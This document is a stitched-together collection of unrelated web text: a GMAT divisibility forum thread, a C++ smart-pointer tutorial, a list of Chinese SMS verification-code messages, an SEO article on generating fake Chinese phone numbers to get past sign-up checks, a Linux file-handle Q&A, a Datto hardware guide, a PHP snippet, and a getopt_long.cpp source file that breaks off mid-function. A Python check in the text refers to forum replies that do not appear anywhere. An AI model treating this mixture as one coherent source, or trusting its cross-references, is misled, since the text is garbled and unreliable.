If yes, should I follow this technique in the exam? Wouldn't it kill time?

Thanks in advance Sir.

https://gmatclub.com/forum/is-12-a-factor-of-the-positive-integer-n-253113.html

gmat-admin's picture
Question link: https://gmatclub.com/forum/is-12-a-factor-of-the-positive-integer-n-2531...
I think you mean to use the word DIVISIBLE, as in "36 is DIVISIBLE by n".

In that case it would be perfectly fine to rephrase everything as:
Is n DIVISIBLE by 12?
(1) 36 is DIVISIBLE by n
(2) n is DIVISIBLE by 3

It's hard to determine which technique is best for you, since different people will feel differently about the easiest way to rephrase the information. Some people prefer "n is a factor of 36" and some prefer "36 is DIVISIBLE by n".

Cheers, Brent

Is x/y an even integer?
(1) x is even.
(2) y is a factor of x.

My explanation:
1/ We don't know about y.
2/ After rephrasing as x/y, we still don't know about y.
After combining 1+2, we still DON'T know about x & y, so it's E... is that a correct explanation?

gmat-admin's picture
I'm a little unclear on what you mean by "after rephrasing x/y; don't know about y." Can you elaborate?

Also, for statement 1, we need to be careful. Not knowing anything about y won't always make the statement insufficient. For example, if the question were....

If x and y are INTEGERS, is x/y an even integer?
(1) x is ODD.

...then statement 1 would be sufficient (even if we don't know anything about y). The reason for this is that, if x is ODD, then x/y can never be even.

Cheers, Brent

As we saw in a line in the last part of the video, "x is divisible by y" = "y is a factor of x". So, in statement (2) I rephrase it as x/y. Is that wrong, sir? And what's the right approach in statement (1), since, as I said, we don't know about y?

Thanks

gmat-admin's picture
You're absolutely right to say that "x is divisible by y" is the same as saying "y is a factor of x". If I understand you correctly, you're also saying that statement 2 can be rephrased as saying "x/y is an integer." This is also correct.

As I mentioned, not knowing anything about y might not always be grounds for concluding a statement is not sufficient. So, to show that statement 1 is not sufficient, I would look for some counterexamples that yield different answers to the target question.
For example:

Target question: Is x/y even?

(1) x is even

CASE I: x = 12 and y = 3. In this case, x/y = 12/3 = 4, and 4 is even. So, the answer to the target question is "YES, x/y is even."

CASE II: x = 12 and y = 4. In this case, x/y = 12/4 = 3, and 3 is not even. So, the answer to the target question is "NO, x/y is not even."

By examining these two possible cases, it is clear that statement 1 is not sufficient.
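Several replies above lean on two checkable facts: the property that if J and K are both divisible by n, then J − K is too (used with K = 20! and n = 15), and the claim that 0 is divisible by any integer. A quick numeric check — the sample values are mine, chosen for illustration:

```python
from math import factorial

n = 15
K = factorial(20)   # 20! contains the factors 3 and 5, so 15 divides it
assert K % n == 0

# If J and K are both divisible by n, then J - K is divisible by n.
for J in (15, 450, 15 * 10**6):
    assert (J - K) % n == 0

# Zero is divisible by any nonzero integer: 0 % m leaves no remainder.
assert all(0 % m == 0 for m in (3, 6, 12))

print("checks pass")
```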
Smart Pointers Gotchas

Posted 19 Feb 2013; updated 27 Aug 2014

Introduction

There are several questions about using smart pointers in modern C++:

• Why is auto_ptr deprecated?
• Why does unique_ptr finally work well?
• How to use arrays with unique_ptr?
• Why create shared_ptr with make_shared?
• How to use arrays with shared_ptr?
• How to pass smart pointers to functions?
• How to cast smart pointers?

While learning how to use the new C++ standard, I came across several issues with smart pointers. In general, you can make a lot fewer mistakes using those helper objects, and it is advised to use them instead of raw pointers as often as possible. Unfortunately, there are some topics you have to understand to take full advantage of them. As in most cases, you get a new tool that solves your problems, but on the other hand this tool introduces some problems of its own.

Some Predefines

Let us take a simple Test class with one member to present further concepts:

class Test
{
public:
    Test() : m_value(0) { std::cout << "Test::Test" << std::endl; }
    ~Test() { std::cout << "Test::~Test destructor" << std::endl; }

    int m_value;
};

typedef std::auto_ptr<Test>   TestAutoPtr;
typedef std::unique_ptr<Test> TestUniquePtr;
typedef std::shared_ptr<Test> TestSharedPtr;

Why is auto_ptr Deprecated?

auto_ptr was one of the first types of smart pointers introduced in C++ (in C++98, to be more precise). It was designed to serve as a simple unique pointer (only one owner, without any reference counter), but people tried to use it as a form of shared pointer as well. Neither of those functionalities is properly satisfied by auto_ptr's implementation!
Quick example below:

void doSomething(TestAutoPtr myPtr)
{
    myPtr->m_value = 11;
}

void AutoPtrTest()
{
    TestAutoPtr myTest(new Test());
    doSomething(myTest);
    myTest->m_value = 10;
}

Try to compile and run this... what happens? It crashes just after we leave the doSomething procedure! We might assume that in doSomething some reference counter for our pointer is incremented, but auto_ptr has no such thing. The object is destroyed because when we leave doSomething our pointer goes out of scope and is deleted. To make it work, we could pass a reference to the auto pointer. Another problem is that we have only a limited way of deleting more complicated objects; there is no control over it at all, only delete can be used here.

Why Does unique_ptr Finally Work Well?

Fortunately, with the new standard we got a brand new set of smart pointers! When we change auto_ptr to std::unique_ptr<Test> in our previous example, we get a compile-time (not runtime) error saying that we cannot pass the pointer to the other function. This is the proper behaviour.

unique_ptr is correctly implemented, basically thanks to move semantics. We can move (but not copy) ownership from one pointer to another. We also need to be aware of when and where we pass ownership. In our example, we can use:

doSomething(std::move(myTest));

to move the pointer's ownership. That way, after the function returns, our pointer is also not valid, but we did it on purpose after all.

Another nice advantage of this type of pointer is that we can use custom deleters. That is useful when we have more complicated resources (files, textures, etc.).

How to Use Arrays with unique_ptr?

First thing to know:

std::unique_ptr<int> p(new int[10]);  // will not work!

The above code will compile, but when the resource is about to be deleted, only a single delete will be called. So how do we ensure that delete[] is called?
Fortunately, unique pointers have a proper partial specialization for arrays, and we can write:

std::unique_ptr<int[]> p(new int[10]);
p[0] = 10;

For our particular example, we can write:

std::unique_ptr<Test[]> tests(new Test[3]);

And we will get the desired output:

Test::Test
Test::Test
Test::Test
Test::~Test destructor
Test::~Test destructor
Test::~Test destructor

As expected. Note that if you want to pass the address of the first element, you have to use &(pointerToArray[0]). Writing pointerToArray will not work.

Why Create shared_ptr with make_shared?

Unique pointers provide their features only via wise usage of C++ syntax (a private copy constructor, assignment, etc.); they do not need any additional memory. With shared_ptr, we need to associate a reference counter with our object. When we do:

std::shared_ptr<Test> sp(new Test());
std::shared_ptr<Test> sp2 = std::make_shared<Test>();

We will get the output as expected:

Test::Test
Test::Test
Test::~Test destructor
Test::~Test destructor

So what is the difference? Why not use syntax similar to the creation of unique_ptr? The answer lies in the allocation process. With the first construct, we need one allocation for the object and then a second for the reference counter. With the second construct, there is only one allocation (using placement new), and the ref counter shares the same memory block as the pointed-to object.

[Figure: VS2012 locals view]

Above, you can see a picture with the locals view in VS 2012. Compare the addresses of the object data and the reference counter block. For sp2, we can see that they are very close to each other. To be sure I got proper results, I even asked a question on Stack Overflow: http://stackoverflow.com/questions/14665935/make-shared-evidence-vs-default-construct.

BTW: in C++14 there is a nice improvement: the make_unique function! That way, creating smart pointers is a bit more 'unified'. We have make_shared and make_unique.

How to Use Arrays with shared_ptr?
Arrays with shared_ptr are a bit trickier than with unique_ptr, but we can use our own deleter and have full control over them:

std::shared_ptr<Test> sp(new Test[2], [](Test *p) { delete [] p; });

We need to use a custom deleter (here, as a lambda expression). Additionally, we cannot use the make_shared construction. Unfortunately, using shared pointers for arrays is not so nice. I suggest taking Boost instead. For instance: http://www.boost.org/doc/libs/1_52_0/libs/smart_ptr/shared_array.htm.

How to Pass Smart Pointers to Functions?

We should use smart pointers as first-class objects in C++, so in general we should pass them by value to functions. That way, the reference counter will increase and decrease correctly. But there are other constructions which seem a bit misleading. Here is some code:

void testSharedFunc(std::shared_ptr<Test> sp)
{
    sp->m_value = 10;
}

void testSharedFuncRef(const std::shared_ptr<Test> &sp)
{
    sp->m_value = 10;
}

void SharedPtrParamTest()
{
    std::shared_ptr<Test> sp = std::make_shared<Test>();

    testSharedFunc(sp);
    testSharedFuncRef(sp);
}

The above code works as assumed, but in testSharedFuncRef we get no benefit from using shared pointers at all! Only testSharedFunc will increase the reference counter. For some performance-critical code we additionally need to note that passing by value requires copying the whole pointer block, so maybe it is better to use even a raw pointer there.

But perhaps the second option (with the reference) is better? It depends. The main question is whether you want full ownership of the object. If not (for instance, you have some generic function that calls methods of the object), then we do not need ownership; simply passing by reference is a good and fast method.

It is not only me who gets confused. Even Herb Sutter paid some attention to this problem, and here is his post on the matter: http://herbsutter.com/2012/06/05/gotw-105-smart-pointers-part-3-difficulty-710/.

How to Cast Smart Pointers?
Let's take a common example with simple inheritance:

class BaseA
{
protected:
    int a{ 0 };
public:
    virtual ~BaseA() { }
    void A(int p) { a = p; }
};

class ChildB : public BaseA
{
private:
    int b{ 0 };
public:
    void B(int p) { b = p; }
};

Without a problem, you can create a smart pointer to BaseA and initialize it with ChildB:

std::shared_ptr<BaseA> ptrBase = std::make_shared<ChildB>();
ptrBase->A(10);

But how do we get a pointer to the ChildB class from ptrBase? Although it is not good practice, sometimes we know it is needed. You can try this:

ChildB *ptrMan = dynamic_cast<ChildB *>(ptrBase.get());
ptrMan->B(10);

It should work. But that way you get a 'normal' pointer only! The use_count of the original ptrBase is not incremented. You can now observe the object, but you are not an owner. It is better to use the casts designed for smart pointers:

std::shared_ptr<ChildB> ptrChild = std::dynamic_pointer_cast<ChildB>(ptrBase);
if (ptrChild)
{
    ptrChild->B(20);
    std::cout << "use count A: " << ptrBase.use_count() << std::endl;
    std::cout << "use count B: " << ptrChild.use_count() << std::endl;
}

By using std::dynamic_pointer_cast you get a shared pointer. Now you are also an owner. The use count for ptrBase and ptrChild is '2' in this case. Take a look at std::static_pointer_cast and std::const_pointer_cast for more information.

What about unique_ptr? In the previous example, you got a copy of the original pointer. But unique_ptr cannot have copies... so it makes no sense to provide casting functions. If you need a cast pointer for observation, you need to do it the old way.

Some Additional Comments

Smart pointers are very useful, but we, as users, also need to be smart. I am not as experienced with smart pointers as I would like to be. For instance, sometimes I am tempted to use raw pointers: I know what will happen, and at the time I can guarantee that it will not mess with the memory. Unfortunately, this can become a problem in the future.
When the code changes, my assumptions may no longer be valid and new bugs may occur. Another thing is when a new developer starts changing my code. With smart pointers, it is not so easy to break things.

This whole topic is a bit complicated, but as usual in C++, we get something at a price. We need to know what we are doing to fully utilize a particular feature.

The code for the article can be found here.

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).

About the Author

Bartlomiej Filipek, Software Developer, Poland. Software developer interested in creating great code and passionate about teaching. I have around 10 years of professional experience in C++/Windows/Visual Studio programming, plus other technologies like OpenGL, game development, and performance optimization. If you like my articles, please subscribe to my coding blog or just visit www.bfilipek.com.
[Youku Video] Your verification code is 8038. It is valid for 5 minutes; do not disclose it to anyone.
[Renrenche Used Cars] 164567 (login verification code). Our staff will never ask you for this code; do not disclose it to anyone, to avoid loss of your account or funds.
[5sing Original Music] Your verification code is 234070. It is valid for 5 minutes; do not disclose it to anyone.
[Wandoujia] Your verification code is 314836. It is valid for 5 minutes; do not disclose it to anyone.
[Baidu Translate] Dear customer: the SMS verification code for your transaction is 198837. Security notice: anyone who asks you for this code is a scammer. Never disclose it!
[Shouxin Input Method] Your registration verification code is 285710. Do not give this code to anyone else; if this was not you, please ignore this message.
[17du Rental & Decoration] Verification code 461481. You are registering as a new user. Thank you for your support!
[360 Browser] Your verification code is 6600. If this was not you, please ignore this message.
[Zhuishu Shenqi] Your verification code is 323191. To keep your account safe, do not give this code to anyone.
[Moji Weather] Verification code: 6726. You are logging in; giving the code to others may lead to account theft. Do not forward or disclose it.

Test Phone Numbers: The Ultimate Guide to Generating Fake Phone Numbers in China

Test phone numbers play a crucial role in various online activities such as testing software, signing up for services, and protecting personal information. In a highly digitized world, phone numbers are often required for verification purposes. However, sharing your real phone number online can lead to privacy and security risks. This is where fake phone numbers come into play. Generating fake phone numbers allows you to maintain your privacy while still complying with verification requirements. In China, the use of fake phone numbers has become increasingly popular due to the strict regulations surrounding the internet and data privacy. So, how can you generate fake phone numbers in China? One of the most common methods is to use online tools and websites that provide temporary phone numbers. These numbers are valid for a short period and can be used for various online activities. Additionally, many apps offer virtual phone numbers that allow you to receive calls and messages without revealing your actual phone number. Using fake phone numbers in China can be especially useful when signing up for online services that require phone verification but may share your information with third parties. By using a fake phone number, you can avoid spam calls and protect your personal data. Another benefit of fake phone numbers is the ability to conduct testing and experiments without using your real phone number.
For developers and software testers, having access to test phone numbers is essential for verifying functionality and ensuring a smooth user experience. Whether you're testing a new app, signing up for a trial account, or conducting market research, fake phone numbers can help streamline the process and protect your privacy. It's important to note that while using fake phone numbers can be convenient, it's essential to use them responsibly. Avoid using fake phone numbers for illegal activities or for malicious purposes. Additionally, be aware of the limitations of using fake phone numbers, such as in situations where phone verification is mandatory for security reasons. In conclusion, test phone numbers and fake phone numbers are valuable tools for maintaining privacy, protecting personal information, and conducting testing activities in a digital world. By understanding how to generate and use fake phone numbers in China, you can enhance your online experience and safeguard your data. Next time you need a temporary phone number for testing or verification, consider using a fake phone number to stay safe and secure in the digital realm.
What happens to an open file handle on Linux if the pointed-to file in the meantime gets:

• Moved away -> does the file handle stay valid?
• Deleted -> does this lead to an EBADF, indicating an invalid file handle?
• Replaced by a new file -> does the file handle point to this new file?
• Replaced by a hard link to a new file -> does my file handle "follow" this link?
• Replaced by a soft link to a new file -> does my file handle hit this soft link file now?

Why I'm asking such questions: I'm using hotplugged hardware (such as USB devices, etc.). It can happen that the device (and also its /dev/ file) gets reattached by the user or another Gremlin. What's the best practice for dealing with this? Thanks for sharing your experience!

6 Answers

If the file is moved (in the same filesystem) or renamed, the file handle remains open and can still be used to read and write the file.

If the file is deleted, the file handle remains open and can still be used (this is not what some people expect). The file will not really be deleted until the last handle is closed.

If the file is replaced by a new file, it depends exactly how. If the file is overwritten, the file handle will still be valid and will access the new content. If the existing file is unlinked and a new one created with the same name, it's the same as deletion (see above).

In general, once the file is open, the file is open, and nobody changing the directory structure can change that. They can move or rename the file, or put something else in its place; it simply remains open. In Unix there is no delete, only unlink(), which makes sense as it doesn't necessarily delete the file; it just removes the link from the directory.

If, on the other hand, the underlying device disappears (e.g.
USB unplug), then the file handle won't be valid any more and is likely to give an I/O error on any operation. You still have to close it, though. This is true even if the device is plugged back in, as it's not sensible to keep a file open in this case.

Comments:
- I suppose that your second point applies equally if a containing directory of the file is deleted. Is that so? – Drew Noakes, Mar 17 '14
- I'm interested in one thing: if you use the cp command to overwrite a file, is it the first case or the second case? – xuhdev, Apr 24 '14

File handles point to an inode, not to a path, so most of your scenarios still work as you assume, since the handle still points to the file. Specifically, regarding the delete scenario, the function is called "unlink" for a reason: it destroys a "link" between a filename (a dentry) and a file. When you open a file, then unlink it, the file actually still exists until its reference count goes to zero, which is when you close the handle.

Edit: In the case of hardware, you have opened a handle to a specific device node. If you unplug the device, the kernel will fail all accesses to it, even if the device comes back. You will have to close the device and reopen it.

The in-memory information of a deleted file (all the examples you give are instances of a deleted file) as well as the inode on disk remain in existence until the file is closed. Hardware being hotplugged is a completely different issue, and you should not expect your program to stay alive long if the on-disk inodes or metadata have changed at all.

I'm not sure about the other operations, but as for deletion: deletion simply doesn't take place (physically, i.e. in the file system) until the last open handle to the file is closed. Thus it should not be possible to delete a file out from under your application.
A few apps (that don't come to mind) rely on this behavior by creating, opening and immediately deleting files, which then live exactly as long as the application, allowing other applications to be aware of the first app's lifecycle without needing to look at process maps and such. It's possible similar considerations apply to the other stuff.

Under the /proc/ directory you will find a list of every process currently active. Just find your PID and all data regarding it is there. An interesting entry is the fd/ folder; there you will find all file handles currently opened by the process. Eventually you will find a symbolic link to your device (under /dev/ or even /proc/bus/usb/). If the device hangs, the link will be dead and it will be impossible to refresh this handle; the process must close and open it again (even after reconnection).

This code can read your PID's current link status:

#include <unistd.h>
#include <stdio.h>
#include <dirent.h>

int main()
{
    // the directory we are going to open
    DIR *d;
    // max length of strings
    int maxpathlength = 256;
    // the buffer for the full path
    char path[maxpathlength];

    // /proc/PID/fd contains the list of the open file descriptors
    // among the respective filenames
    sprintf(path, "/proc/%i/fd/", getpid());
    printf("List of %s:\n", path);

    struct dirent *dir;
    d = opendir(path);
    if (d) {
        // loop for each file inside d
        while ((dir = readdir(d)) != NULL) {
            // let's check if it is a symbolic link
            if (dir->d_type == DT_LNK) {
                const int maxlength = 256;
                // string returned by readlink()
                char hardfile[maxlength];
                // string length returned by readlink()
                int len;
                // tempath will contain the current filename
                // among the fullpath
                char tempath[maxlength];

                sprintf(tempath, "%s%s", path, dir->d_name);
                if ((len = readlink(tempath, hardfile, maxlength - 1)) != -1) {
                    hardfile[len] = '\0';
                    printf("%s -> %s\n", dir->d_name, hardfile);
                } else
                    printf("error when executing readlink() on %s\n", tempath);
            }
        }
        closedir(d);
    }
    return 0;
}

This final code is simple; you can play with the linkat function.

int open_dir(char * path)
{
    int fd;

    path = strdup(path);
    *strrchr(path, '/') = '\0';
    fd = open(path, O_RDONLY | O_DIRECTORY);
    free(path);

    return fd;
}

int main(int argc, char * argv[])
{
    int odir, ndir;
    char * ofile, * nfile;
    int status;

    if (argc != 3)
        return 1;

    odir = open_dir(argv[1]);
    ofile = strrchr(argv[1], '/') + 1;

    ndir = open_dir(argv[2]);
    nfile = strrchr(argv[2], '/') + 1;

    status = linkat(odir, ofile, ndir, nfile, AT_SYMLINK_FOLLOW);
    if (status) {
        perror("linkat failed");
    }

    return 0;
}

If you want to check whether a file handle (file descriptor) is okay, you can call this function:

/**
 * version : 1.1
 * date    : 2015-02-05
 * func    : check if the file descriptor is fine.
 */

#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <stdio.h>

/**
 * On success, zero is returned. On error, -1 is returned, and errno is set
 * appropriately.
 */
int check_fd_fine(int fd)
{
    struct stat _stat;
    int ret = -1;

    if (!fcntl(fd, F_GETFL)) {
        if (!fstat(fd, &_stat)) {
            if (_stat.st_nlink >= 1)
                ret = 0;
            else
                printf("File was deleted!\n");
        }
    }
    if (errno != 0)
        perror("check_fd_fine");

    return ret;
}

int main()
{
    int fd = -1;

    fd = open("/dev/ttyUSB1", O_RDONLY);
    if (fd < 0) {
        perror("open file fail");
        return -1;
    }

    // close or remove the file (remove usb device)
    // close(fd);
    sleep(5);

    if (!check_fd_fine(fd)) {
        printf("fd okay!\n");
    } else {
        printf("fd bad!\n");
    }

    close(fd);
    return 0;
}
ALERT: Datto Drive Cloud service will no longer be available as of June 1, 2019. For more information, see our end-of-life article. To learn how to download your Datto Drive Cloud data, please visit this article.

Swapping a SIRIS Business OS Drive

Scope

This article walks through how to swap the OS drive on a SIRIS Business device. Before replacing the OS drive, contact Datto Support so that they can take any necessary steps prior to the swap. You should also contact Support again once the new drive is in place to ensure the device is running properly.

Tools Required:

• PH1 cross-head screwdriver
• PH2 cross-head screwdriver
• Small cable ties
• Monitor and keyboard for accessing the device after replacing the OS drive

Swapping the OS Drive

1. Power down and unplug the device. Locate and remove the three screws that secure the chassis cover.
2. Slide the chassis cover towards the rear of the device. You will have to push in on the top and sides while simultaneously pulling the cover.
3. Locate the OS drive (Kingston SSD 60GB) mounted to the front of the device and disconnect its SATA and power cables.
4. Remove the USB 3.0 connector from the motherboard. Moving aside the power cables from the PSU will make the replacement easier.
5. Remove the four screws from the drive plate that secures the OS drive.
6. Remove the OS drive and drive plate by sliding it slightly backwards and then pulling it up off of the device. Again, move the power cables aside for easier access. You should label the old OS drive to differentiate it from the new one.
7. Install the new OS drive to the mounting plate, making sure that it is fitted on the raised/stilted side of the mounting plate. Then screw it back into the chassis.
8. Reattach the SATA, power, and USB 3.0 cables and verify the connections are snug and secure. Tuck the power cables back into place in the chassis (see image from Step 2 for reference).
9.
Carefully replace the chassis cover, making sure that all cables are clear. Once fitted, reinstall the three original screws removed in Step 1.
10. Connect a keyboard and monitor, along with the power and Ethernet cables.
11. Contact Datto Support to begin checking in the device.
renderJson - how to renderXML?

hi, i have this in a function:

    return $this->response->withJson($args);

now i want to do the same but with XML. what function like "withJson" do i need to render my file as XML?

We don't have a short-cut for XML. You will have to write your own.

so how can i do a sitemap without a package?

Keeping a public sitemap would be up to the developer.

hi, if someone needs the code (works with Twig):

    protected function renderXML($template, $args = [])
    {
        // render the XML template and set the Content-Type header
        $this->view->render($this->response, $template . '.xml', $args);
        return $this->response->withHeader('Content-Type', 'text/xml');
    }
path: root/lib/win32/getopt_long.cpp
/* $OpenBSD: getopt_long.c,v 1.20 2005/10/25 15:49:37 jmc Exp $ */
/* $NetBSD: getopt_long.c,v 1.15 2002/01/31 22:43:40 tv Exp $ */

// Adapted for Box Backup by Chris Wilson <[email protected]>

/*
 * Copyright (c) 2002 Todd C. Miller <[email protected]>
 *
 * Permission to use, copy, modify, and distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 *
 * Sponsored in part by the Defense Advanced Research Projects
 * Agency (DARPA) and Air Force Research Laboratory, Air Force
 * Materiel Command, USAF, under agreement number F39502-99-1-0512.
 */
/*-
 * Copyright (c) 2000 The NetBSD Foundation, Inc.
 * All rights reserved.
 *
 * This code is derived from software contributed to The NetBSD Foundation
 * by Dieter Baron and Thomas Klausner.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2.
    Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *        This product includes software developed by the NetBSD
 *        Foundation, Inc. and its contributors.
 * 4. Neither the name of The NetBSD Foundation nor the names of its
 *    contributors may be used to endorse or promote products derived
 *    from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
 * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
 * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 */

// #include "Box.h"
#include "emu.h"

#include <errno.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#include "box_getopt.h"

#ifdef REPLACE_GETOPT // until end of file

int opterr = 1;    /* if error message should be printed */
int optind = 1;    /* index into parent argv vector */
int optopt = '?';  /* character checked for validity */
int optreset;      /* reset getopt */
char *optarg;      /* argument associated with option */

#define PRINT_ERROR ((opterr) && (*options != ':'))

#define FLAG_PERMUTE  0x01  /* permute non-options to the end of argv */
#define FLAG_ALLARGS  0x02  /* treat non-options as args to option "-1" */
#define FLAG_LONGONLY 0x04  /* operate as getopt_long_only */

/* return values */
#define BADCH   (int)'?'
#define BADARG  ((*options == ':') ? (int)':' : (int)'?')
#define INORDER (int)1

#define EMSG ""

static void warnx(const char* fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    fprintf(stderr, "\n");
}

static int getopt_internal(int, char * const *, const char *,
    const struct option *, int *, int);
static int parse_long_options(char * const *, const char *,
    const struct option *, int *, int);
static int gcd(int, int);
static void permute_args(int, int, int, char * const *);

static char *place = EMSG; /* option letter processing */

/* XXX: set optreset to 1 rather than these two */
static int nonopt_start = -1; /* first non option argument (for permute) */
static int nonopt_end = -1;   /* first option after non options (for permute) */

/* Error messages */
static const char recargchar[] = "option requires an argument -- %c";
static const char recargstring[] = "option requires an argument -- %s";
static const char ambig[] = "ambiguous option -- %.*s";
static const char noarg[] = "option doesn't take an argument -- %.*s";
static const char illoptchar[] = "unknown option -- %c";
static const char illoptstring[] = "unknown option -- %s";

/*
 * Compute the greatest common divisor of a and b.
 */
static int
gcd(int a, int b)
{
    int c;

    c = a % b;
    while (c != 0) {
        a = b;
        b = c;
        c = a % b;
    }

    return (b);
}

/*
 * Exchange the block from nonopt_start to nonopt_end with the block
 * from nonopt_end to opt_end (keeping the same order of arguments
 * in each block).
 */
static void
permute_args(int panonopt_start, int panonopt_end, int opt_end,
    char * const *nargv)
{
    int cstart, cyclelen, i, j, ncycle, nnonopts, nopts, pos;
    char *swap;

    /*
     * compute lengths of blocks and number and size of cycles
     */
    nnonopts = panonopt_end - panonopt_start;
    nopts = opt_end - panonopt_end;
    ncycle = gcd(nnonopts, nopts);
    cyclelen = (opt_end - panonopt_start) / ncycle;

    for (i = 0; i < ncycle; i++) {
        cstart = panonopt_end+i;
        pos = cstart;
        for (j = 0; j < cyclelen; j++) {
            if (pos >= panonopt_end)
                pos -= nnonopts;
            else
                pos += nopts;
            swap = nargv[pos];
            /* LINTED const cast */
            ((char **) nargv)[pos] = nargv[cstart];
            /* LINTED const cast */
            ((char **)nargv)[cstart] = swap;
        }
    }
}

/*
 * parse_long_options --
 *	Parse long options in argc/argv argument vector.
 * Returns -1 if short_too is set and the option does not match long_options.
 */
static int
parse_long_options(char * const *nargv, const char *options,
    const struct option *long_options, int *idx, int short_too)
{
    char *current_argv, *has_equal;
    size_t current_argv_len;
    int i, match;

    current_argv = place;
    match = -1;

    optind++;

    if ((has_equal = strchr(current_argv, '=')) != NULL) {
        /* argument found (--option=arg) */
        current_argv_len = has_equal - current_argv;
        has_equal++;
    } else
        current_argv_len = strlen(current_argv);

    for (i = 0; long_options[i].name; i++) {
        /* find matching long option */
        if (strncmp(current_argv, long_options[i].name,
            current_argv_len))
            continue;

        if (strlen(long_options[i].name) == current_argv_len) {
            /* exact match */
            match = i;
            break;
        }
        /*
         * If this is a known short option, don't allow
         * a partial match of a single character.
		 */
		if (short_too && current_argv_len == 1)
			continue;

		if (match == -1) /* partial match */
			match = i;
		else {
			/* ambiguous abbreviation */
			if (PRINT_ERROR)
				warnx(ambig, (int)current_argv_len,
				      current_argv);
			optopt = 0;
			return (BADCH);
		}
	}
	if (match != -1) { /* option found */
		if (long_options[match].has_arg == no_argument && has_equal) {
			if (PRINT_ERROR)
				warnx(noarg, (int)current_argv_len,
				      current_argv);
			/*
			 * XXX: GNU sets optopt to val regardless of flag
			 */
			if (long_options[match].flag == NULL)
				optopt = long_options[match].val;
			else
				optopt = 0;
			return (BADARG);
		}
		if (long_options[match].has_arg == required_argument ||
		    long_options[match].has_arg == optional_argument) {
			if (has_equal)
				optarg = has_equal;
			else if (long_options[match].has_arg ==
			    required_argument) {
				/*
				 * optional argument doesn't use next nargv
				 */
				optarg = nargv[optind++];
			}
		}
		if ((long_options[match].has_arg == required_argument) &&
		    (optarg == NULL)) {
			/*
			 * Missing argument; leading ':' indicates no error
			 * should be generated.
			 */
			if (PRINT_ERROR)
				warnx(recargstring, current_argv);
			/*
			 * XXX: GNU sets optopt to val regardless of flag
			 */
			if (long_options[match].flag == NULL)
				optopt = long_options[match].val;
			else
				optopt = 0;
			--optind;
			return (BADARG);
		}
	} else { /* unknown option */
		if (short_too) {
			--optind;
			return (-1);
		}
		if (PRINT_ERROR)
			warnx(illoptstring, current_argv);
		optopt = 0;
		return (BADCH);
	}
	if (idx)
		*idx = match;
	if (long_options[match].flag) {
		*long_options[match].flag = long_options[match].val;
		return (0);
	} else
		return (long_options[match].val);
}

/*
 * getopt_internal --
 *	Parse argc/argv argument vector.  Called by user level routines.
 */
static int
getopt_internal(int nargc, char * const *nargv, const char *options,
		const struct option *long_options, int *idx, int flags)
{
	const char *oli; /* option letter list index */
	int optchar, short_too;
	static int posixly_correct = -1;

	if (options == NULL)
		return (-1);

	/*
	 * Disable GNU extensions if POSIXLY_CORRECT is set or options
	 * string begins with a '+'.
	 */
	if (posixly_correct == -1)
		posixly_correct = (getenv("POSIXLY_CORRECT") != NULL);
	if (posixly_correct || *options == '+')
		flags &= ~FLAG_PERMUTE;
	else if (*options == '-')
		flags |= FLAG_ALLARGS;
	if (*options == '+' || *options == '-')
		options++;

	/*
	 * XXX Some GNU programs (like cvs) set optind to 0 instead of
	 * XXX using optreset.  Work around this braindamage.
	 */
	if (optind == 0)
		optind = optreset = 1;

	optarg = NULL;
	if (optreset)
		nonopt_start = nonopt_end = -1;
start:
	if (optreset || !*place) { /* update scanning pointer */
		optreset = 0;
		if (optind >= nargc) { /* end of argument vector */
			place = EMSG;
			if (nonopt_end != -1) {
				/* do permutation, if we have to */
				permute_args(nonopt_start, nonopt_end,
					     optind, nargv);
				optind -= nonopt_end - nonopt_start;
			} else if (nonopt_start != -1) {
				/*
				 * If we skipped non-options, set optind
				 * to the first of them.
				 */
				optind = nonopt_start;
			}
			nonopt_start = nonopt_end = -1;
			return (-1);
		}
		if (*(place = nargv[optind]) != '-' ||
		    (place[1] == '\0' && strchr(options, '-') == NULL)) {
			place = EMSG; /* found non-option */
			if (flags & FLAG_ALLARGS) {
				/*
